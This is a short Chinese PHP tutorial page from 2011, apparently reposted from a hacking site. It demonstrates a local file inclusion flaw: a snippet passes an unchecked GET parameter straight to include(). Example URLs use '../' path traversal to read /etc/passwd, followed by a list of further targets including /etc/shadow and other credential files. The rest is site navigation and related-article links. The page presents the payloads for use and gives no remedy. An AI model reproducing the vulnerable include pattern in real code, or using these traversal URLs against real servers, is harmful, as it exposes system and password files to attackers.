编程 PHP

php 伪造本地文件包含漏洞的代码

Posted in PHP onNovember 03, 2011

代码:

<?php 
$page=$_GET['page']; 
include($page.'php'); 
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

php 伪造本地文件包含漏洞的代码

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

MVC模式的PHP实现

Oct 09 PHP

基于mysql的论坛（2）

Oct 09 PHP

PHP Token(令牌)设计

Mar 15 PHP

php 输出双引号"与单引号'的方法

May 09 PHP

php中用加号与用array_merge合并数组的区别深入分析

Jun 03 PHP

关于PHP内存溢出问题的解决方法

Jun 25 PHP

php命令行使用方法和命令行参数说明

Apr 08 PHP

PHP根据传入参数合并多个JS和CSS文件的简单实现

Jun 13 PHP

微信公众平台网页授权获取用户基本信息中授权回调域名设置的变动

Oct 21 PHP

php提高网站效率的技巧

Sep 29 PHP

PHP获取远程http或ftp文件的md5值的方法

Apr 15 PHP

gearman管理工具GearmanManager的安装与php使用方法示例

Feb 27 PHP

有关php运算符的知识大全

Nov 03 #PHP

PHP读取txt文件的内容并赋值给数组的代码

Nov 03 #PHP

PHP支持多种格式图片上传(支持jpg、png、gif)

Nov 03 #PHP

PHP安全防范技巧分享

Nov 03 #PHP

防止本地用户用fsockopen DDOS攻击对策

Nov 02 #PHP

PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64_decode)

Nov 02 #PHP

php数组函数序列之krsort()- 对数组的元素键名进行降序排序,保持索引关系

Nov 02 #PHP

ICF-F10(1) SRF-40W(1) 德劲1107(1) 上海永华(1) YH-R296(1) PR-D3L(1) 华普R-96(1) 德生1994(1) SRF-22W(1) ICF-SW100(1)

You might like

[EPIC] Larva vs Flash ZvT @ Crossing Field [2017-10-09]

2020/03/17 星际争霸

为什么那些咖啡爱好者大多看不上连锁咖啡店？

2021/03/06 咖啡文化

ajax实现无刷新分页(php)

2010/07/18 PHP

使用Apache的htaccess防止图片被盗链的解决方法

2013/04/27 PHP

php获取Google机器人访问足迹的方法

2015/04/15 PHP

php实现向javascript传递数组的方法

2015/07/27 PHP

PHP中file_get_contents函数抓取https地址出错的解决方法(两种方法)

2015/09/22 PHP

laravel框架与其他框架的详细对比

2019/10/23 PHP

学习YUI.Ext 第二天

2007/03/10 Javascript

javascript 在firebug调试时用console.log的方法

2012/05/10 Javascript

JavaScript将一个数组插入到另一个数组的方法

2015/03/19 Javascript

jQuery选择器及jquery案例详解(必看)

2016/05/20 Javascript

几种二级联动案例（jQuery\Array\Ajax php）

2016/08/13 Javascript

微信小程序使用第三方库Immutable.js实例详解

2016/09/27 Javascript

jQuery插件HighCharts实现的2D回归直线散点效果示例【附demo源码下载】

2017/03/09 Javascript

Vue+jquery实现表格指定列的文字收缩的示例代码

2018/01/09 jQuery

搭建基于express框架运行环境的方法步骤

2018/11/15 Javascript

详解babel升级到7.X采坑总结

2019/05/12 Javascript

小程序调用微信支付的方法

2019/09/26 Javascript

使用 Jest 和 Supertest 进行接口端点测试实例详解

2020/04/25 Javascript

微信小程序仿抖音短视频切换效果的实例代码

2020/06/24 Javascript

JavaScript实现沿五角星形线摆动的小圆实例详解

2020/07/28 Javascript

[13:25]VP vs VICI (BO3)

2018/06/07 DOTA

使用Python脚本对Linux服务器进行监控的教程

2015/04/02 Python

12个Python程序员面试必备问题与答案(小结)

2019/06/24 Python

python GUI库图形界面开发之PyQt5工具栏控件QToolBar的详细使用方法与实例

2020/02/28 Python

python3 中使用urllib问题以及urllib详解

2020/08/03 Python

PyQt实现计数器的方法示例

2021/01/18 Python

Pytorch如何切换 cpu和gpu的使用详解

2021/03/01 Python

HTML5新增的表单元素和属性实例解析

2014/07/07 HTML / CSS

精选鞋类、服装和配饰的全球领先目的地：Bodega

2021/02/27 全球购物

用友笔试题目

2016/10/25 面试题

酒店优秀员工事迹材料

2014/06/02 职场文书

售后客服个人自我评价

2014/09/14 职场文书

团队合作精神学习心得体会

2016/01/19 职场文书

Java实现字符串转为驼峰格式的方法详解

2022/07/07 Java/Android